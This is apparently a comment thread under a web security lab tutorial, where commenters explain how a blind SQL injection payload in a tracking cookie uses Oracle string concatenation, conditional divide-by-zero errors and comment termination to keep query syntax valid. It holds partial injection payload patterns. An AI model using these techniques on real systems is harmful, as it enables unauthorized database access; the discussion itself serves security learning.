i've got the same question,too

@@mavisjelena5154 It's a string concatenation operator in Oracle DBs. You have to try to imagine what the query looks like in the source code and also what your insertion point is within the query. From there you have to imagine what you can insert while still maintain proper syntax at the end of the completed query. Also consider what the web app page code looks like. They're both in play. docs.oracle.com/cd/A87860_01/doc/server.817/a85397/operator.htm We don't have the benefit of seeing the source code here. But I'm guessing the insertion point is in the WHERE clause. Also, the source code of the page may only be expecting a specific number of columns and rows back from the database.... Say for example 1 row and 2 columns. This is probably why: [cookie value]' AND SELECT....... doesn't work as it returns unexpected results (more columns or more rows) than the page code is expecting - causing a 500 server-side error all the time even though the SQL syntax may be correct.... String concatenation allows you to insert text into one of the expected columns returned, thus not exceeding the number of rows and columns the web page app code is expecting back. So you don't blow up the page by having the DB produce unexpected and unhandled columns/rows. Something to keep in mind is that most web apps will behave this way. They're going to expect a specific number of rows and columns in the source code. Additionally strongly typed languages such as C# may even be expecting a specific data type (int, char, varchar, etc...). They address the possibility of incompatible data types by having the conditional error return nothing/null. So the end result is nothing is concatenated to the cookie original string. The two outcomes are either a divide by zero error which causes a 500 error on the page. Or the query concatenates nothing/null to the cookie and the page behaves as normal as the web app gets exactly what it's expecting from the DB.... It's crafty....

@@BelowAverageRazzleDazzle Thanks a lot! I can understand how to concatenate in this situation, but I cannot understand the last concatenation operator. Is There anything after that? I think that the SQL sentence is: SELECT column FROM table WHERE trackingid = 'cookie' and plus the payload it would be: SELECT column FROM table WHERE trackingid = 'cookie' || (SELECT '' FROM dual) || ' Then, What are we concatenating with the last operator? (I really want to be clear with my english :) ) Thanks!

@@giorgiozunino I wondered the exact same thing but I think i figured it out. If the SQL sentence is: SELECT column FROM table WHERE trackingid = "cookie" (I changed the ' to " so you can see which are the original ones.) The payload would make the query: SELECT column FROM table WHERE trackingid = "cookie' || (Select statement)" So now you have one " left which breakes the syntax. You can solve that with the additional || thingy: SELECT column FROM table WHERE trackingid = "cookie' || (Select statement) || ' " Which just concatenates some empty string. But what also works is the method we learned before: SELECT column FROM table WHERE trackingid = "cookie' || (Select statement)-- " I have tested both methods and they work.